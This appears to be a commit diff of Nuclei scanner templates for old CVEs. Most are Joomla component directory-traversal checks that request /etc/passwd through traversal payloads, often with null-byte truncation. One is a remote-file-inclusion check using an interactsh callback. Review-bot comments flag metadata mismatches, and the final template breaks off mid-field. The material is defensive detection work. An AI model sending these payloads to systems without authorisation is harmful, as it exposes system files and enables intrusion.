author: geeknik
severity: high
tags: cve,cve2009,krweb,rfi
requests:
- method: GET
path:
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "http"
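Review bot: The `description` is the product blurb for KR-Web and never says what is vulnerable. Describe the issue the request tests: a remote URL passed in the `DOCUMENT_ROOT` parameter of `adm/krgourl.php`, confirmed by the HTTP callback that the `interactsh_protocol` matcher checks.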

View File

@ -0,0 +1,27 @@
id: CVE-2009-4679
info:
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
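Review bot: The request uses `option=com_kif_nexus`, but the `description` names the component `com_if_nexus`; confirm which identifier is correct, since a wrong `option` value turns the template into a silent false negative. The `name` also says Remote File Inclusion while the description and the `lfi` tag describe local inclusion, and `reference: |` is the block-scalar form that this commit replaces with a list in other templates.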

View File

@ -0,0 +1,27 @@
id: CVE-2009-5114
info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference:
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: CVE-2010-0467
info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: medium
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags: cve,cve2010,joomla,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.80
cve-id: CVE-2010-0467
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
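Review bot: `reference: |` makes the two URLs a single multi-line string rather than a list; elsewhere in this commit the same field is converted to `reference:` followed by list items. Drop the `|` here too so the field parses the same way across templates.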

View File

@ -0,0 +1,27 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
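Review bot: The `description` says the traversal relies on a modified sequence, `./../.../`, yet the path sends plain `../` segments. If download.php filters ordinary `../`, this request does not reach `/etc/passwd` on a vulnerable install; check against the referenced exploit and use the sequence it documents.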

View File

@ -0,0 +1,27 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
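
Review bot: the `path` entry ends in `%00`, so the check only fires where the server still truncates the include path at a NUL byte. PHP 5.3.4 and later treat such paths as invalid, so a host running the affected component on a newer PHP returns no match. State that dependency in `description` so a clean result is not read as "component absent or patched".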

View File

@ -0,0 +1,27 @@
id: CVE-2010-0943
info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference:
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-0944
info:
name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-0972
info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-0982
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-0985
info:
name: Joomla! Component com_abbrev - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10948
- https://www.cvedetails.com/cve/CVE-2010-0985
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1217
info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
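
Review bot: `name` says JE Tooltip 1.0, while the request and the description both target `option=com_jeformcr` (JE Form Creator). Whoever triages a hit will look for the wrong extension; name the probed component in `name` and leave the JE Tooltip attribution to the NOTE already in the description.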

View File

@ -0,0 +1,26 @@
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1307
info:
name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1308
info:
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12066
- https://www.cvedetails.com/cve/CVE-2010-1308
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1312
info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1313
info:
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
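
Review bot: `name` reads "Saber Cart", but the description and the `option=com_sebercart` parameter spell it Seber Cart. Correct the name so a search for the component finds this template.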

View File

@ -0,0 +1,27 @@
id: CVE-2010-1314
info:
name: Joomla! Component Highslide 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1315
info:
name: Joomla! Component webERPcustomer - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11999
- https://www.cvedetails.com/cve/CVE-2010-1315
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1340
info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1345
info:
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15453
- https://www.cvedetails.com/cve/CVE-2010-1345
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1352
info:
name: Joomla! Component Juke Box 1.7 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12084
- https://www.cvedetails.com/cve/CVE-2010-1352
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
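
Review bot: the component is "Juke Box" in `name` and "Jutebox" in `description`, while the request uses `com_jukebox`. Settle on one spelling, or say in the description which one is the advisory's wording, so a finding can be matched to an extension inventory by name.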

View File

@ -0,0 +1,27 @@
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1354
info:
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1461
info:
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
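
Review bot: the `reference: |` line turns the reference URLs into a single block string instead of a YAML list, unlike the neighbouring templates that use a bare `reference:`. Tooling that iterates over references will see one entry with embedded newlines and leading `- `; remove the `|`.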

View File

@ -0,0 +1,27 @@
id: CVE-2010-1469
info:
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
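
Review bot: `reference: |` makes this field a literal string rather than a list of URLs, which differs from the plain `reference:` form used by most templates in this commit. Remove the `|` so both links are separate list items.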

View File

@ -0,0 +1,27 @@
id: CVE-2010-1470
info:
name: Joomla! Component Web TV 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12166
- https://www.cvedetails.com/cve/CVE-2010-1470
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1471
info:
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12170
- https://www.cvedetails.com/cve/CVE-2010-1471
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1472
info:
name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12167
- https://www.cvedetails.com/cve/CVE-2010-1472
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1473
info:
name: Joomla! Component Advertising 0.25 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12171
- https://www.cvedetails.com/cve/CVE-2010-1473
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1474
info:
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1475
info:
name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12147
- https://www.cvedetails.com/cve/CVE-2010-1475
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
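
Review bot: the `path` entry has `controller==../../...` with a doubled `=`, so the parameter value begins with a literal `=` ahead of the traversal segments, unlike the other templates shown in this commit (`controller=../`). That looks like a typo and is likely to make the check miss vulnerable hosts; drop the extra `=`.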

View File

@ -0,0 +1,27 @@
id: CVE-2010-1476
info:
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12150
- https://www.cvedetails.com/cve/CVE-2010-1476
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
